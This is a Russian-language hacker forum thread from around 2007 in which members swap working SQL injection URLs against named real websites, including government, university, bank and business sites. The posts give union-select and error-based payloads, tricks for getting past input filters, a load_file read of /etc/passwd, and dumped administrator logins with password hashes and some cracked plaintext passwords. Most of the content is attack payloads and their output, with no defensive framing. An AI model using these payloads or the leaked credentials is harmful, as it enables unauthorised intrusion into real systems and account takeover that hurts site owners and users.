SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. [53x]Shadow

    [53x]Shadow Leaders of Antichat

    Joined:
    25 Jan 2007
    Messages:
    284
    Likes Received:
    597
    Reputations:
    514
    еще гов))

    maps2.nris.mt.gov
    Code:
    http://maps2.nris.mt.gov/Mapper/MapWindow.asp?Profile=-1+or+1=@@version--
    http://maps2.nris.mt.gov/Mapper/MapWindow.asp?Profile=-1+or+1=(select+system_user)--
    
     
    1 person likes this.
  2. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748
    http://anime.kz/index.html

     
    5 people like this.
  3. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    www.rusbiz.ru

    Ресурс представляет из себя многоотраслевой портал с электронной торговой площадкой. Основной целью портала является содействие компаниям малого и среднего бизнеса в расширении сфер своей деятельности, увеличении объемов продаж, нахождении новых деловых связей за рубежом и проведении бизнес сделок через Интернет. Всё бы хорошо, но... Банальный SQL-Injection в параметре servid.

    Получаем список таблиц:
    Получаем список полей в заданной таблице:
    * Обратите внимание на использование /**/ вместо стандартных вариантов представления пробела... Это вызвано тем, что фходной параметр фильтруется (хоть и криво). Фильтрация делает невозможным использование %20 или + в качестве пробела, также фильтруется =, поэтому пришлось воспользоваться операцией IN.

    Из интересных таблиц имеем USER и forum_user, но форум по техническим причинам отключён, поэтому дело будем иметь только с первой таблицей. Таблица имеет такую структуру:
    • password - пароль аккаунта в md5
    • user_group - группа аккаунта (может быть user, admin и т.д.)
    • blocked - активированный аккаунт или нет
    • lastlogin - время последнего посещения

    Начнём вторжение в святая святых:
    По данному запросу возвращается две записи pol и systemuser. Это два админских аккаунта.

    Пароли свёрнуты в md5:

    pol:890a09778691261d1e1e7c65f6101d3c
    systemuser:972c97bdc47dfc8def0e74c55da0bbfd


    В помощь Джон и через пару секунд:

    pol:51619
    systemuser:explore


    Ну чтож... Админы никогда не научатся проявлять фантазию при задании паролей от критических ресурсов... Должен заметить, что половина базы снимается одним проходом по словарю и прямым брутом по 0...9 в длине 8 символов.

    Не знаю как быстро прикроют эту багу, ибо такое впечатление, что там админ в онлайне... Но в доказательство приведу ещё один аккаунт:

    green:1604
     
    1 person likes this.
  4. SWAT

    SWAT Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    198
    Likes Received:
    196
    Reputations:
    -7
    Code:
    http://www.yesmag.ca/bugbeat/bugs.php?id=-8+union+select+1,2,3,4,5,VERSION(),USER()/*
     
    2 people like this.
  5. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    PHP:
    http://www.lada-auto.ru/cgi-bin/news.pl?id=-1'
     
  6. halkfild

    halkfild Members of Antichat

    Joined:
    11 Nov 2005
    Messages:
    365
    Likes Received:
    578
    Reputations:
    313
    cs.xeka.ru
    движек - psyhostats
    вот скули.. нашел почти сразу но были проблемы с выводом.. потом пошаманил с лимит 0 помогло [:


    тут еще много ксс, но пару лишь, нашел пока скули искал :)
    много столбцов)


    вывод всякой инфи
    5.0.45-community-nt-log:ps_mafia:root@localhost

    1 STEAM_0:1:пароли сказали потереть::belo4ka 1 2% 3 12.00
    2 АЙ-ПИ::LeXXXuS 1 2% 3 12.00
    3 АЙ-ПИ::Admir@L 1 2% 3 12.00
    4 АЙ-ПИ::belo4ka 1 2% 3 12.00

    belo4ka:пароли сказали потереть:1
    1 :пароли сказали потереть:1 1 2% 3 12.00
    2 :пароли сказали потереть:10 1 2% 3 12.00


    з.ы. вывод понравился так как там была таблица не надо было тянуть по одной))
    з.з.ы движек сегодня увидел первый раз.. мо там есть еще что-то поинтереснее но рыть особо не стал [:
    з.з.ы ися был осведомлен)
    з.з.ы потер пароли и мыла
     
    _________________________
    #3126 halkfild, 20 Sep 2007
    Last edited: 20 Sep 2007
    8 people like this.
  7. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    vodnyy.odessa.ua
     
    1 person likes this.
  8. phol1eadeux

    phol1eadeux Elder - Старейшина

    Joined:
    7 Aug 2007
    Messages:
    108
    Likes Received:
    48
    Reputations:
    -1
    Code:
    http://www.vkus.by/index.php?n=-1+union+select+1,2,3,4,5,6/*
    MySQL : 4 версия
     
    1 person likes this.
  9. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    "раскрутил" скулю Slider'a "попроще"
    сразу говорю сорри, когда раскручивал не видел что слайдер сам уже раскрутил..
    Code:
    http://anime.kz/index.html?mode=links&pid=6+UNION+SELECT+1,login,3,4,pwd,6,7+from+user/*
    + своя:

    Code:
    http://www.borytucholskie.pl/index.php?id=-1+union+select+1,password+from+users/*
    пароль, логин - ненашёл :(
    Code:
    http://www.borytucholskie.pl/index.php?id=-1+union+select+1,column_name+from+INFOrMATION_SCHEMA.COLUMnS+WHERE+TABLE_NAME=users+limit+0,1/*
    http://www.borytucholskie.pl/index.php?id=-1+union+select+1,column_name+from+INFOrMATION_SCHEMA.COLUMnS+WHERE+TABLE_NAME='users'+limit+0,1/*
    
    Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /index.php on line 10
    :(
     
  10. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    2BlackCats

    Code:
    http://www.borytucholskie.pl/index.php?id=-1+union+select+1,column_name+from+INFOrMATION_SCHEMA.COLUMnS+WHERE+TABLE_NAME=CHAR(117,115,101,114,115)+limit+1,1/*
    кавычки фильтруются ;)
     
    1 person likes this.
  11. Sutted

    Sutted Banned

    Joined:
    16 Sep 2007
    Messages:
    15
    Likes Received:
    0
    Reputations:
    -1
    Scipio, хм, я не пойму как вы из этого извлекаете логин и пароль? У меня вот появилось в середине страницы:
    А как из этого пользу извлечь не пойму( объясни плз.
     
  12. Heavy Metal

    Heavy Metal Member

    Joined:
    16 Sep 2007
    Messages:
    19
    Likes Received:
    27
    Reputations:
    7
    http://theboard.byu.edu/
    Code:
    http://theboard.byu.edu/index.php?area=viewall&id=-1+union+select+version(),user(),concat_ws(0x3a,username,user_password),4,database(),6,7,8,0x6865617679206D6574616C203A44,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+100Hrbb_users+limit+1,1
    http://theboard.byu.edu/index.php?area=viewall&id=-1+union+select+1,2,load_file(0x2F6574632F706173737764),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.tables
    
    
    http://primes.utm.edu
    Code:
    http://primes.utm.edu/bios/page.php?id=&username=sdf%27+union+select+concat_ws(0x203a20,username,pass),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2,2,2,2,2,2,2,2,2,2,2,2,2,2+FROM+person+limit+1,1/*
    http://hitl.washington.edu (Postgre 8 без прав, лениво ковырять)
    Code:
    http://www.hitl.washington.edu/people/papers.php?name=jksdelly'+union+select+relname,null,null+from+pg_class+where+relname%3C%3E'alum_person'+and+relname%3C%3E'alum_person_alumid_seq'+and+relname%3C%3E'alum_position'+and+''='
     
    2 people like this.
  13. z01b

    z01b Муджахид

    Joined:
    5 Jan 2007
    Messages:
    494
    Likes Received:
    382
    Reputations:
    22
    Code:
    http://www.northberwickuk.com/info.php?id=-1+union+select+0,version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,25,26,27/*&catid=324&f=NorthBerwick&type=featured
    Code:
    http://www.kinogalerija.lv/info.php?id=-1+union+select+version(),1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
     
    #3133 z01b, 22 Sep 2007
    Last edited: 22 Sep 2007
    1 person likes this.
  14. SWAT

    SWAT Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    198
    Likes Received:
    196
    Reputations:
    -7
    Code:
    http://admiral.delfi.lv/index.php?id=-48390++union+select+1,table_name,3+from+INFORMATION_SCHEMA.TABLES+limit+1,1/*
     
    1 person likes this.
  15. z01b

    z01b Муджахид

    Joined:
    5 Jan 2007
    Messages:
    494
    Likes Received:
    382
    Reputations:
    22
    Code:
    http://www.ability.nl/info.php?ID=-1+union+select+0,2,version()/*
     
    2 people like this.
  16. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    Code:
    htp://www.erikdevlieger.com/kunst.php?rq=list&id=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6/*  [email protected]:4.1.21-log:imcavas_erikdevlieger
    Code:
    http://www.spcompanyspb.com/goods.php?type=-1+union+select+concat(user(),0x3a,version(),0x3a,database())/*&style=5  u7821@localhost:5.0.24-Debian_1-log:u7821: цензуро =\
    Code:
      http://www.fenixbel.com/site.php?id=-1+union+select+concat(user(),0x3a,version(),0x3a,database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*  [email protected]:5.0.45-log:merkator_2222
     
    1 person likes this.
  17. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    Code:
    http://www.tolkien.it/catalogo/item.asp?ID=1+or+1=(SELECT+TOP+1+passw+from+Tadmins+where+username='roby')--
     
  18. _-Ramos-_

    _-Ramos-_ Banned

    Joined:
    4 Jan 2007
    Messages:
    174
    Likes Received:
    215
    Reputations:
    8
    www.chip.ua - сайт журнала CHIP

    Code:
    http://www.chip.ua/?page=poll&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
    Скуль так розкрутить не удалось =\

    P.S: _http://www.ichip.ru/?page=poll&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
    тот же результат =)
     
    #3138 _-Ramos-_, 22 Sep 2007
    Last edited: 22 Sep 2007
    1 person likes this.
  19. c001er*

    c001er* Elder - Старейшина

    Joined:
    15 Jun 2007
    Messages:
    20
    Likes Received:
    18
    Reputations:
    0
    http://www.sgbank.ru/news.asp?news_id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('bankdel','bankseek','cbr','currency_exch','currency_opt','currency_zayavka','doc_req','documents','dtproperties','forums','keybaseb','keybasef','messages','news1'))--
    baser192:12345
     
    1 person likes this.
  20. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    Google Page Rank 8/10
    WebAlta WTR 9/10


    4-ая версия..

    логин+пароль:

    Code:
    http://www.mnogosearch.org/bugs/bugs.php?id=-1+union+select+1,2,pass,4,5,6,7,8,9,user,11,12,13,14,15,16+from+user/*
    логин:
    bar
    хэш пасса:
    948f878a52bb69d5e54fe8d04dcddfd5
     
    #3140 BlackCats, 22 Sep 2007
    Last edited: 22 Sep 2007
Thread Status:
Not open for further replies.